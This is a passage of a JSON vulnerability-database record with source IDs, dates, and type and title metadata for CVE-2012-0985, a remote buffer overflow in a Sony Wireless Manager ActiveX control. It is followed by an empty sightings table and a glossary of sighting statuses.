"id": "113131"
},
{
"db": "PACKETSTORM",
"id": "113193"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
},
{
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-54266"
},
{
"date": "2012-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2012-0985"
},
{
"date": "2012-05-30T00:00:00",
"db": "BID",
"id": "53735"
},
{
"date": "2012-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"date": "2012-05-30T23:51:10",
"db": "PACKETSTORM",
"id": "113131"
},
{
"date": "2012-06-01T09:14:09",
"db": "PACKETSTORM",
"id": "113193"
},
{
"date": "2012-05-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-543"
},
{
"date": "2012-06-07T19:55:06.993000",
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULHUB",
"id": "VHN-54266"
},
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2012-0985"
},
{
"date": "2012-05-30T00:00:00",
"db": "BID",
"id": "53735"
},
{
"date": "2012-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002641"
},
{
"date": "2012-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-543"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2012-0985"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Sony Product Wireless Manager ActiveX Control buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002641"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-543"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.